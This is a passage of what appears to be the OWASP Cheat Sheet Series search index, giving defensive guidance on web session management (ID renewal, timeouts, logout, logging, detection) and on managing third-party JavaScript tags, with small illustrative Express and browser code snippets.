The most common web development frameworks provide session functions and methods to renew the session ID, such as request.getSession(true) & HttpSession.invalidate() (J2EE), Session.Abandon() & Response.Cookies.Add(new...) (ASP .NET), or session_start() & session_regenerate_id(true) (PHP).
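In a Node.js application using the widely deployed express-session middleware, the equivalent renewal step after login could be sketched as follows (the authenticate() helper is illustrative):

// After successful credential verification, discard the pre-authentication session ID
// and issue a fresh one before storing any authenticated state.
app.post('/login', (req, res) => {
  authenticate(req.body.username, req.body.password, (err, user) => {
    if (err || !user) return res.status(401).end();
    req.session.regenerate((regenErr) => {
      if (regenErr) return res.status(500).end();
      req.session.userId = user.id;      // state is bound to the new session ID only
      res.redirect('/home');
    });
  });
});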

The session ID regeneration is mandatory to prevent session fixation attacks, where an attacker sets the session ID on the victim user's web browser instead of gathering the victim's session ID, as in most of the other session-based attacks, and independently of using HTTP or HTTPS. This protection mitigates the impact of other web-based vulnerabilities that can also be used to launch session fixation attacks, such as HTTP response splitting or XSS (see here and here).

A complementary recommendation is to use a different session ID or token name (or set of session IDs) pre and post authentication, so that the web application can keep track of anonymous users and authenticated users without the risk of exposing or binding the user session between both states.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#considerations-when-using-multiple-cookies","title":"Considerations When Using Multiple Cookies","text":"

If the web application uses cookies as the session ID exchange mechanism, and multiple cookies are set for a given session, the web application must verify all cookies (and enforce relationships between them) before allowing access to the user session.

It is very common for web applications to set a user cookie pre-authentication over HTTP to keep track of unauthenticated (or anonymous) users. Once the user authenticates in the web application, a new post-authentication secure cookie is set over HTTPS, and a binding between both cookies and the user session is established. If the web application does not verify both cookies for authenticated sessions, an attacker can make use of the pre-authentication unprotected cookie to get access to the authenticated user session (see here and here).

Web applications should try to avoid the same cookie name for different paths or domain scopes within the same web application, as this increases the complexity of the solution and potentially introduces scoping issues.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-expiration","title":"Session Expiration","text":"

In order to minimize the time period an attacker can launch attacks over active sessions and hijack them, it is mandatory to set expiration timeouts for every session, establishing the amount of time a session will remain active. Insufficient session expiration by the web application increases the exposure of other session-based attacks, as for the attacker to be able to reuse a valid session ID and hijack the associated session, it must still be active.

The shorter the session interval is, the less time an attacker has to use the valid session ID. The session expiration timeout values must be set in accordance with the purpose and nature of the web application, and must balance security and usability, so that the user can comfortably complete operations within the web application without their session frequently expiring.

Both the idle and absolute timeout values are highly dependent on how critical the web application and its data are. Common idle timeout ranges are 2-5 minutes for high-value applications and 15-30 minutes for low-risk applications. Absolute timeouts depend on how long a user usually uses the application. If the application is intended to be used by an office worker for a full day, an appropriate absolute timeout range could be between 4 and 8 hours.

When a session expires, the web application must take active actions to invalidate the session on both sides, client and server. The latter is the most relevant and mandatory from a security perspective.

For most session exchange mechanisms, client side actions to invalidate the session ID are based on clearing out the token value. For example, to invalidate a cookie it is recommended to provide an empty (or invalid) value for the session ID, and set the Expires (or Max-Age) attribute to a date from the past (in case a persistent cookie is being used): Set-Cookie: id=; Expires=Friday, 17-May-03 18:45:00 GMT

In order to close and invalidate the session on the server side, it is mandatory for the web application to take active actions when the session expires, or the user actively logs out, by using the functions and methods offered by the session management mechanisms, such as HttpSession.invalidate() (J2EE), Session.Abandon() (ASP .NET) or session_destroy()/unset() (PHP).
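With express-session, for example, a logout handler that performs the server-side destruction and also clears the cookie on the client could be sketched as follows (the cookie name is whatever the application configured):

app.post('/logout', (req, res) => {
  req.session.destroy(() => {             // invalidate the session server-side
    res.clearCookie('SESSIONID');         // illustrative cookie name; clears it on the client
    res.redirect('/login');
  });
});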

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-session-expiration","title":"Automatic Session Expiration","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#idle-timeout","title":"Idle Timeout","text":"

All sessions should implement an idle or inactivity timeout. This timeout defines the amount of time a session will remain active in case there is no activity in the session, closing and invalidating the session upon the defined idle period since the last HTTP request received by the web application for a given session ID.

The idle timeout limits the chances an attacker has to guess and use a valid session ID from another user. However, if the attacker is able to hijack a given session, the idle timeout does not limit the attacker's actions, as they can generate activity on the session periodically to keep the session active for longer periods of time.

Session timeout management and expiration must be enforced server-side. If the client is used to enforce the session timeout, for example using the session token or other client parameters to track time references (e.g. number of minutes since login time), an attacker could manipulate these to extend the session duration.
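A minimal sketch of server-side idle timeout enforcement, independent of any client-supplied hints; express-session is assumed and the 15-minute value is only illustrative:

const IDLE_TIMEOUT_MS = 15 * 60 * 1000;   // illustrative value

// Express middleware: the last-activity timestamp lives in the server-side session store
function enforceIdleTimeout(req, res, next) {
  const now = Date.now();
  if (req.session.lastActivity && now - req.session.lastActivity > IDLE_TIMEOUT_MS) {
    return req.session.destroy(() => res.status(401).send('Session expired'));
  }
  req.session.lastActivity = now;
  next();
}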

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#absolute-timeout","title":"Absolute Timeout","text":"

All sessions should implement an absolute timeout, regardless of session activity. This timeout defines the maximum amount of time a session can be active, closing and invalidating the session upon the defined absolute period since the given session was initially created by the web application. After invalidating the session, the user is forced to (re)authenticate again in the web application and establish a new session.

The absolute timeout limits the amount of time an attacker can use a hijacked session to impersonate the victim user.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#renewal-timeout","title":"Renewal Timeout","text":"

Alternatively, the web application can implement an additional renewal timeout after which the session ID is automatically renewed, in the middle of the user session, and independently of the session activity and, therefore, of the idle timeout.

After a specific amount of time since the session was initially created, the web application can regenerate a new ID for the user session and try to set it, or renew it, on the client. The previous session ID value would still be valid for some time, accommodating a safety interval, before the client is aware of the new ID and starts using it. At that time, when the client switches to the new ID inside the current session, the application invalidates the previous ID.

This scenario minimizes the amount of time a given session ID value, potentially obtained by an attacker, can be reused to hijack the user session, even while the victim's session is still active. The user session remains alive and open on the legitimate client, although its associated session ID value is transparently renewed periodically during the session, every time the renewal timeout expires. Therefore, the renewal timeout complements the idle and absolute timeouts, especially when the absolute timeout value extends significantly over time (e.g. when it is an application requirement to keep user sessions open for long periods of time).

Depending on the implementation, there could potentially be a race condition where an attacker holding a still-valid previous session ID sends a request before the victim user, right after the renewal timeout has expired, and obtains the renewed session ID value first. At least in this scenario, the victim user might become aware of the attack, as their session will suddenly be terminated because the associated session ID is no longer valid.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#manual-session-expiration","title":"Manual Session Expiration","text":"

Web applications should provide mechanisms that allow security-aware users to actively close their session once they have finished using the web application.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logout-button","title":"Logout Button","text":"

Web applications must provide a visible and easily accessible logout (logoff, exit, or close session) button that is available in the web application header or menu and reachable from every web application resource and page, so that the user can manually close the session at any time. As described in the Session Expiration section, the web application must invalidate the session at least on the server side.

NOTE: Unfortunately, not all web applications make it easy for users to close their current session. Thus, client-side enhancements allow conscientious users to protect their sessions by helping to close them diligently.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#web-content-caching","title":"Web Content Caching","text":"

Even after the session has been closed, it might be possible to access the private or sensitive data exchanged within the session through the web browser cache. Therefore, web applications must use restrictive cache directives for all the web traffic exchanged through HTTP and HTTPS, such as the Cache-Control and Pragma HTTP headers, and/or equivalent META tags on all or (at least) sensitive web pages.

Independently of the cache policy defined by the web application, if caching web application contents is allowed, the session IDs must never be cached, so it is highly recommended to use the Cache-Control: no-cache=\"Set-Cookie, Set-Cookie2\" directive, to allow web clients to cache everything except the session ID (see here).
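As an illustration, restrictive cache directives can be applied globally in an Express application; no-store is the strictest option for sensitive pages:

// Apply restrictive caching to every response (the scope can be narrowed to sensitive routes)
app.use((req, res, next) => {
  res.set('Cache-Control', 'no-store');   // do not cache sensitive responses at all
  res.set('Pragma', 'no-cache');          // legacy HTTP/1.0 equivalent
  next();
});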

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#additional-client-side-defenses-for-session-management","title":"Additional Client-Side Defenses for Session Management","text":"

Web applications can complement the previously described session management defenses with additional countermeasures on the client side. Client-side protections, typically in the form of JavaScript checks and verifications, are not bulletproof and can easily be defeated by a skilled attacker, but they can introduce another layer of defense that intruders have to bypass.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#initial-login-timeout","title":"Initial Login Timeout","text":"

Web applications can use JavaScript code in the login page to evaluate and measure the amount of time since the page was loaded and a session ID was granted. If a login attempt is made after a specific amount of time, the client code can notify the user that the maximum amount of time to log in has passed and reload the login page, hence retrieving a new session ID.

This extra protection mechanism tries to force the renewal of the session ID pre-authentication, avoiding scenarios where a previously used (or manually set) session ID is reused by the next victim using the same computer, for example, in session fixation attacks.
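A minimal client-side sketch of this idea; the 5-minute limit and the form id are illustrative:

// Reload the login page (obtaining a fresh session ID) if the user takes too long to log in
const LOGIN_WINDOW_MS = 5 * 60 * 1000;
const loadedAt = Date.now();

document.getElementById('login-form').addEventListener('submit', (event) => {
  if (Date.now() - loadedAt > LOGIN_WINDOW_MS) {
    event.preventDefault();
    alert('This login page has expired and will be reloaded.');
    window.location.reload();
  }
});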

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#force-session-logout-on-web-browser-window-close-events","title":"Force Session Logout On Web Browser Window Close Events","text":"

Web applications can use JavaScript code to capture all the web browser tab or window close (or even back) events and take the appropriate actions to close the current session before closing the web browser, emulating that the user has manually closed the session via the logout button.
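A sketch of this behavior using the pagehide event and navigator.sendBeacon(), which is designed to deliver a final request while the page is being unloaded; the /logout endpoint is illustrative and the server must still invalidate the session on its side:

// Best-effort logout when the tab or window is closed or navigated away from
window.addEventListener('pagehide', () => {
  navigator.sendBeacon('/logout');
});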

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#disable-web-browser-cross-tab-sessions","title":"Disable Web Browser Cross-Tab Sessions","text":"

Web applications can use JavaScript code once the user has logged in and a session has been established to force the user to re-authenticate if a new web browser tab or window is opened against the same web application. The web application does not want to allow multiple web browser tabs or windows to share the same session. Therefore, the application tries to force the web browser to not share the same session ID simultaneously between them.

NOTE: This mechanism cannot be implemented if the session ID is exchanged through cookies, as cookies are shared by all web browser tabs/windows.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#automatic-client-logout","title":"Automatic Client Logout","text":"

JavaScript code can be used by the web application in all (or critical) pages to automatically log out client sessions after the idle timeout expires, for example, by redirecting the user to the logout page (the same resource used by the logout button mentioned previously).

The benefit of enhancing the server-side idle timeout functionality with client-side code is that the user can see that the session has finished due to inactivity, or can even be notified in advance that the session is about to expire through a countdown timer and warning messages. This user-friendly approach helps to avoid loss of work in web pages that require extensive input data when sessions expire silently on the server side.
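A minimal sketch of this client-side companion to the server-side idle timeout; the timings and logout URL are illustrative and should mirror the server-side configuration:

const IDLE_LIMIT_MS = 15 * 60 * 1000;      // must match the server-side idle timeout
const WARNING_MS = 60 * 1000;              // warn one minute before expiration
let warnTimer, logoutTimer;

function resetTimers() {
  clearTimeout(warnTimer);
  clearTimeout(logoutTimer);
  warnTimer = setTimeout(() => alert('Your session is about to expire.'), IDLE_LIMIT_MS - WARNING_MS);
  logoutTimer = setTimeout(() => { window.location.href = '/logout'; }, IDLE_LIMIT_MS);
}

['click', 'keydown', 'scroll'].forEach((evt) => document.addEventListener(evt, resetTimers));
resetTimers();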

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-attacks-detection","title":"Session Attacks Detection","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-id-guessing-and-brute-force-detection","title":"Session ID Guessing and Brute Force Detection","text":"

If an attacker tries to guess or brute force a valid session ID, they need to launch multiple sequential requests against the target web application using different session IDs from a single (or set of) IP address(es). Additionally, if an attacker tries to analyze the predictability of the session ID (e.g. using statistical analysis), they need to launch multiple sequential requests from a single (or set of) IP address(es) against the target web application to gather new valid session IDs.

Web applications must be able to detect both scenarios based on the number of attempts to gather (or use) different session IDs and alert and/or block the offending IP address(es).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#detecting-session-id-anomalies","title":"Detecting Session ID Anomalies","text":"

Web applications should focus on detecting anomalies associated with the session ID, such as its manipulation. The OWASP AppSensor Project provides a framework and methodology to implement built-in intrusion detection capabilities within web applications, focused on the detection of anomalies and unexpected behaviors in the form of detection points and response actions. Instead of using external protection layers, sometimes the business logic details and advanced intelligence are only available inside the web application, where it is possible to establish multiple session-related detection points, such as when an existing cookie is modified or deleted, a new cookie is added, the session ID from another user is reused, or the user location or User-Agent changes in the middle of a session.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#binding-the-session-id-to-other-user-properties","title":"Binding the Session ID to Other User Properties","text":"

With the goal of detecting (and, in some scenarios, protecting against) user misbehaviors and session hijacking, it is highly recommended to bind the session ID to other user or client properties, such as the client IP address, User-Agent, or client-based digital certificate. If the web application detects any change or anomaly between these different properties in the middle of an established session, this is a very good indicator of session manipulation and hijacking attempts, and this simple fact can be used to alert and/or terminate the suspicious session.

Although these properties cannot be used by web applications to reliably defend against session attacks, they significantly increase the web application's detection (and protection) capabilities. However, a skilled attacker can bypass these controls by reusing the same IP address assigned to the victim user, by sharing the same network (very common in NAT environments, like Wi-Fi hotspots) or by using the same outbound web proxy (very common in corporate environments), or by manually modifying their User-Agent to look exactly like the victim user's.
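A sketch of this detection on the server side, again assuming express-session; how to respond to a mismatch (alerting, terminating, or both) remains an application decision:

// Record the client fingerprint when the session is created, then compare it on every request
function bindSessionToClient(req, res, next) {
  const fingerprint = { ip: req.ip, userAgent: req.get('User-Agent') };
  if (!req.session.fingerprint) {
    req.session.fingerprint = fingerprint;
  } else if (req.session.fingerprint.ip !== fingerprint.ip ||
             req.session.fingerprint.userAgent !== fingerprint.userAgent) {
    console.warn('Possible session hijacking detected for user', req.session.userId);
    return req.session.destroy(() => res.status(401).send('Session terminated'));
  }
  next();
}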

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#logging-sessions-life-cycle-monitoring-creation-usage-and-destruction-of-session-ids","title":"Logging Sessions Life Cycle: Monitoring Creation, Usage, and Destruction of Session IDs","text":"

Web applications should increase their logging capabilities by including information regarding the full life cycle of sessions. In particular, it is recommended to record session-related events, such as the creation, renewal, and destruction of session IDs, as well as details about their usage within login and logout operations, privilege level changes within the session, timeout expiration, invalid session activities (when detected), and critical business operations during the session.

The log details might include a timestamp, source IP address, web target resource requested (and involved in a session operation), HTTP headers (including the User-Agent and Referer), GET and POST parameters, error codes and messages, username (or user ID), plus the session ID (cookies, URL, GET, POST\u2026).

Sensitive data like the session ID should not be included in the logs in order to protect the session logs against session ID local or remote disclosure or unauthorized access. However, some kind of session-specific information must be logged in order to correlate log entries to specific sessions. It is recommended to log a salted-hash of the session ID instead of the session ID itself in order to allow for session-specific log correlation without exposing the session ID.
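One way to implement the salted-hash recommendation is a keyed hash (HMAC), sketched here with Node.js built-ins; the key is illustrative and must itself be protected and kept out of the logs:

const crypto = require('crypto');

const LOG_HASH_KEY = 'a-secret-unique-to-this-deployment';   // illustrative; load from a secret store

// Log a keyed hash of the session ID instead of the session ID itself
function sessionIdForLogs(sessionId) {
  return crypto.createHmac('sha256', LOG_HASH_KEY).update(sessionId).digest('hex');
}

// logger.info(`login ok user=${userId} sid=${sessionIdForLogs(req.sessionID)}`);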

In particular, web applications must thoroughly protect administrative interfaces that allow managing all the currently active sessions. Frequently these are used by support personnel to solve session-related issues, or even general issues, by impersonating the user and looking at the web application as the user does.

The session logs become one of the main web application intrusion detection data sources, and can also be used by intrusion protection systems to automatically terminate sessions and/or disable user accounts when (one or many) attacks are detected. If active protections are implemented, these defensive actions must be logged too.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#simultaneous-session-logons","title":"Simultaneous Session Logons","text":"

It is a web application design decision to determine whether multiple simultaneous logons from the same user are allowed from the same or from different client IP addresses. If the web application does not want to allow simultaneous session logons, it must take effective actions after each new authentication event, implicitly terminating the previously available session, or asking the user (through the old, new or both sessions) which session must remain active.

It is recommended for web applications to add user capabilities that allow checking the details of active sessions at any time, monitor and alert the user about concurrent logons, provide user features to remotely terminate sessions manually, and track account activity history (logbook) by recording multiple client details such as IP address, User-Agent, login date and time, idle time, etc.

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#session-management-waf-protections","title":"Session Management WAF Protections","text":"

There are situations where the web application source code is not available or cannot be modified, or when the changes required to implement the multiple security recommendations and best practices detailed above imply a full redesign of the web application architecture, and therefore, cannot be easily implemented in the short term.

In these scenarios, or to complement the web application defenses, and with the goal of keeping the web application as secure as possible, it is recommended to use external protections such as Web Application Firewalls (WAFs) that can mitigate the session management threats already described.

Web Application Firewalls offer detection and protection capabilities against session based attacks. On the one hand, it is trivial for WAFs to enforce the usage of security attributes on cookies, such as the Secure and HttpOnly flags, applying basic rewriting rules on the Set-Cookie header for all the web application responses that set a new cookie.

On the other hand, more advanced capabilities can be implemented to allow the WAF to keep track of sessions, and the corresponding session IDs, and apply all kinds of protections against session fixation (by renewing the session ID on the client side when privilege changes are detected), enforcing sticky sessions (by verifying the relationship between the session ID and other client properties, like the IP address or User-Agent), or managing session expiration (by forcing both the client and the web application to finalize the session).

The open-source ModSecurity WAF, plus the OWASP Core Rule Set, provide capabilities to detect and apply security cookie attributes, countermeasures against session fixation attacks, and session tracking features to enforce sticky sessions.

"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html","title":"TLS Cipher String Cheat Sheet","text":""},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Mozilla Foundation provides an easy-to-use secure configuration generator for web, database, and mail software. This online (and regularly updated) tool allows site administrators to select the software they are using and receive a configuration file that is both safe and compatible with a wide variety of browser versions and server software.

For more information please visit https://ssl-config.mozilla.org/.

"},{"location":"cheatsheets/TLS_Cipher_String_Cheat_Sheet.html#related-articles","title":"Related Articles","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html","title":"Third Party JavaScript Management Cheat Sheet","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Tags, aka marketing tags, analytics tags etc., are small bits of JavaScript on a web page. They can also be HTML image elements when JavaScript is disabled. Their purpose is to collect data on user actions and browsing context for use by the web page owner in marketing.

Third party vendor JavaScript tags (hereinafter, tags) can be divided into two types:

User interface tags have to execute on the client because they change the DOM, e.g. displaying a dialog or image, or changing text.

Analytics tags send information back to a marketing information database; information like what user action was just taken, browser metadata, location information, page metadata etc. The rationale for analytics tags is to provide data from the user's browser DOM to the vendor for some form of marketing analysis. This data can be anything available in the DOM. The data is used for user navigation and clickstream analysis, identification of the user to determine further content to display etc., and various marketing analysis functions.

The term host refers to the original site the user goes to, such as a shopping or news site, that contains or retrieves and executes a third-party JavaScript tag for marketing analysis of the user actions.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#major-risks","title":"Major risks","text":"

The single greatest risk is a compromise of the third party JavaScript server, and the injection of malicious JavaScript into the original tag JavaScript. This has happened in 2018 and likely earlier.

The invocation of third-party JS code in a web application requires consideration for 3 risks in particular:

  1. The loss of control over changes to the client application,
  2. The execution of arbitrary code on client systems,
  3. The disclosure or leakage of sensitive information to 3rd parties.
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-1-loss-of-control-over-changes-to-the-client-application","title":"Risk 1: Loss of control over changes to the client application","text":"

This risk arises from the fact that there is usually no guarantee that the code hosted at the third party will remain the same as seen by the developers and testers: new features may be pushed into the third-party code at any time, potentially breaking the interface or data flows and affecting the availability of your application for its users/customers.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent alterations by 3rd parties), sub-resource integrity (to enable browser-level interception) and secure transmission of the third-party code (to prevent modifications while in-transit). See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-2-execution-of-arbitrary-code-on-client-systems","title":"Risk 2: Execution of arbitrary code on client systems","text":"

This risk arises from the fact that third-party JavaScript code is rarely reviewed by the invoking party prior to its integration into a website/application. As the client reaches the hosting website/application, this third-party code gets executed, thus granting the third-party the exact same privileges that were granted to the user (similar to XSS attacks).

Any testing performed prior to entering production loses some of its validity, including AST testing (IAST, RAST, SAST, DAST, etc.).

While it is widely accepted that the probability of having rogue code intentionally injected by the third-party is low, there are still cases of malicious injections in third-party code after the organization's servers were compromised (ex: Yahoo, January 2014).

This risk should therefore still be evaluated, in particular when the third-party does not show any documentation that it is enforcing better security measures than the invoking organization itself, or at least equivalent. Another example is that the domain hosting the third-party JavaScript code expires because the company maintaining it is bankrupt or the developers have abandoned the project. A malicious actor can then re-register the domain and publish malicious code.

Typical defenses include, but are not restricted to:

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#risk-3-disclosure-of-sensitive-information-to-3rd-parties","title":"Risk 3: Disclosure of sensitive information to 3rd parties","text":"

When a third-party script is invoked in a website/application, the browser directly contacts the third-party servers. By default, the request includes all regular HTTP headers. In addition to the originating IP address of the browser, the third-party also obtains other data such as the referrer (in non-https requests) and any cookies previously set by the 3rd party, for example when visiting another organization's website that also invokes the third-party script.

In many cases, this grants the third party primary access to information on the organization's users / customers / clients. Additionally, if the third party is sharing the script with other entities, it also collects secondary data from all the other entities, thus learning not only who the organization's visitors are but also what other organizations they interact with.

A typical case is the current situation with major news/press sites that invoke third-party code (typically for ad engines, statistics and JavaScript APIs): any user visiting any of these websites also informs the 3rd parties of the visit. In many cases, the third-party also gets to know what news articles each individual user is clicking specifically (leakage occurs through the HTTP referrer field) and thus can establish deeper personality profiles.

Typical defenses include, but are not restricted to: in-house script mirroring (to prevent leakage of HTTP requests to 3rd parties). Users can reduce their profiling by randomly clicking links on leaking websites/applications (such as press/news websites). See below for more details.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#third-party-javascript-deployment-architectures","title":"Third-party JavaScript Deployment Architectures","text":"

There are three basic deployment mechanisms for tags. These mechanisms can be combined with each other.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#vendor-javascript-on-page","title":"Vendor JavaScript on page","text":"

This is where the vendor provides the host with the JavaScript and the host puts it on the host page. To be secure the host company must review the code for any vulnerabilities like XSS attacks or malicious actions such as sending sensitive data from the DOM to a malicious site. This is often difficult because the JavaScript is commonly obfuscated.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n<html>\n<head></head>\n    <body>\n        ...\n        <script\u00a0type=\"text/javascript\">/*\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0here\u00a0*/</script>\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#javascript-request-to-vendor","title":"JavaScript Request to Vendor","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL directly from the vendor site. When the host page is being created, the developer includes the lines of code provided by the vendor that will request the vendor JavaScript. Each time the page is accessed, requests are made to the vendor site for the JavaScript, which then executes in the user's browser.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n<html>\n    <head></head>\n    <body>\n        ...\n        <!--\u00a03rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n        <script\u00a0src=\"https://analytics.vendor.com/v1.1/script.js\"></script>\n        <!--\u00a0/3rd\u00a0party\u00a0vendor\u00a0javascript\u00a0-->\n    </body>\n</html>\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#indirect-request-to-vendor-through-tag-manager","title":"Indirect request to Vendor through Tag Manager","text":"

This is where one or a few lines of code on the host page each request a JavaScript file or URL from a tag aggregator or tag manager site, not from the JavaScript vendor site. The tag aggregator or tag manager site returns whatever third-party JavaScript files the host company has configured to be returned. Each file or URL request to the tag manager site can return lots of other JavaScript files from multiple vendors.

The actual content that is returned from the aggregator or manager (i.e. the specific JavaScript files as well as exactly what they do) can be dynamically changed by host site employees using a graphical development user interface hosted on the tag manager site, which non-technical users, such as the marketing part of the business, can work with.

The changes can be either:

  1. Get a different JavaScript file from the third-party vendor for the same request.
  2. Change what DOM object data is read, and when, to send to the vendor.

The tag manager developer user interface will generate code that does what the marketing functionality requires, basically determining what data to get from the browser DOM and when to get it. The tag manager always returns a container JavaScript file to the browser which is basically a set of JavaScript functions that are used by the code generated by the user interface to implement the required functionality.

Similar to Java frameworks that provide functions and global data to the developer, the container JavaScript executes in the browser and lets the business user use the tag manager developer user interface to specify high-level functionality without needing to know JavaScript.

<!--\u00a0Some\u00a0host,\u00a0e.g.\u00a0foobar.com,\u00a0HTML\u00a0code\u00a0here\u00a0-->\n\u00a0<html>\n\u00a0\u00a0\u00a0<head></head>\n\u00a0\u00a0\u00a0\u00a0\u00a0<body>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0...\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0Tag\u00a0Manager\u00a0-->\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<script>(function(w,\u00a0d,\u00a0s,\u00a0l,\u00a0i){\nw[l]\u00a0=\u00a0w[l]\u00a0||\u00a0[];\nw[l].push({'tm.start':new\u00a0Date().getTime(),\u00a0event:'tm.js'});\nvar\u00a0f\u00a0=\u00a0d.getElementsByTagName(s)[0],\nj\u00a0=\u00a0d.createElement(s),\ndl\u00a0=\u00a0l\u00a0!=\u00a0'dataLayer'\u00a0?\u00a0'&l='\u00a0+\u00a0l\u00a0:\u00a0'';\nj.async=true;\nj.src='https://tagmanager.com/tm.js?id='\u00a0+\u00a0i\u00a0+\u00a0dl;\nf.parentNode.insertBefore(j,\u00a0f);\n})(window,\u00a0document,\u00a0'script',\u00a0'dataLayer',\u00a0'TM-FOOBARID');</script>\n\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0<!--\u00a0/Tag\u00a0Manager\u00a0-->\n\u00a0\u00a0\u00a0</body>\n</html>`\n
"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-problems-with-requesting-tags","title":"Security Problems with requesting Tags","text":"

The previously described mechanisms are difficult to make secure because you can only see the code if you proxy the requests or if you get access to the GUI and see what is configured. The JavaScript is generally obfuscated so even seeing it is usually not useful. It is also instantly deployable because each new page request from a browser executes the requests to the aggregator which gets the JavaScript from the third party vendor. So as soon as any JavaScript files are changed on the vendor, or modified on the aggregator, the next call for them from any browser will get the changed JavaScript. One way to manage this risk is with the Subresource Integrity standard described below.

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer","title":"Server Direct Data Layer","text":"

The tag manager developer user interface can be used to create JavaScript that can get data from anywhere in the browser DOM and store it anywhere on the page. This can allow vulnerabilities because the interface can be used to generate code to get unvalidated data from the DOM (e.g. URL parameters) and store it in some page location that would execute JavaScript.

The best way to make the generated code secure is to confine it to getting DOM data from a host defined data layer.

The data layer is either:

  1. a DIV object with attribute values that have the marketing or user behavior data that the third-party wants
  2. a set of JSON objects with the same data. Each variable or attribute contains the value of some DOM element or the description of a user action. The data layer is the complete set of values that all vendors need for that page. The data layer is created by the host developers.

When specific events happen that the business has defined, a JavaScript handler for that event sends values from the data layer directly to the tag manager server. The tag manager server then sends the data to whatever third party or parties is supposed to get it. The event handler code is created by the host developers using the tag manager developer user interface. The event handler code is loaded from the tag manager servers on every page load.

This is a secure technique because only your JavaScript executes in your users' browsers, and only the data you decide on is sent to the vendor.

This requires cooperation between the host, the aggregator or tag manager and the vendors.

The host developers have to work with the vendor in order to know what type of data the vendor needs to do their analysis. Then the host programmer determines what DOM element will have that data.

The host developers have to work with the tag manager or aggregator to agree on the protocol to send the data to the aggregator: what URL, parameters, format etc.

The tag manager or aggregator has to work with the vendor to agree on the protocol to send the data to the vendor: what URL, parameters, format etc. Does the vendor have an API?

"},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#security-defense-considerations","title":"Security Defense Considerations","text":""},{"location":"cheatsheets/Third_Party_Javascript_Management_Cheat_Sheet.html#server-direct-data-layer_1","title":"Server Direct Data Layer","text":"

The server direct mechanism is a good security standard for third party JavaScript management, deployment and execution. A good practice for the host page is to create a data layer of DOM objects.

The data layer can perform any validation of the values, especially values from DOM objects exposed to the user like URL parameters and input fields, if these are required for the marketing analysis.

An example statement for a corporate standard document is: 'The tag JavaScript can only access values in the host data layer. The tag JavaScript can never access a URL parameter.'

You, the host page developer, have to agree with the third-party vendors or the tag manager on which attribute in the data layer will hold which value, so they can create the JavaScript to read that value.

User interface tags cannot be made secure using the data layer architecture because their function (or one of their functions) is to change the user interface on the client, not to send data about the user actions.

Analytics tags can be made secure using the data layer architecture because the only action needed is to send data from the data layer to the third party. Only first party code is executed; first to populate the data layer (generally on page load); then event handler JavaScript sends whatever data is needed from that page to the third party database or tag manager.

This is also a very scalable solution. Large ecommerce sites can easily have hundreds of thousands of URL and parameter combinations, with different sets of URLs and parameters being included in different marketing analysis campaigns. The marketing logic could have 30 or 40 different vendor tags on a single page.

For example, user actions in pages about specified cities, from specified locations on specified days, should send data layer elements 1, 2 and 3, while user actions in pages about other cities should send data layer elements 2 and 3 only. Since the event handler code that sends data layer data on each page is controlled by the host developers or marketing technologists using the tag manager developer interface, the business logic about when and which data layer elements are sent to the tag manager server can be changed and deployed in minutes. No interaction is needed with the third parties; they continue getting the data they expect, but now it comes from different contexts that the host marketing technologists have chosen.

Changing third-party vendors just means changing the data dissemination rules at the tag manager server; no changes are needed in the host code. The data also goes directly to the tag manager only, so execution is fast. The event handler JavaScript does not have to connect to multiple third-party sites.

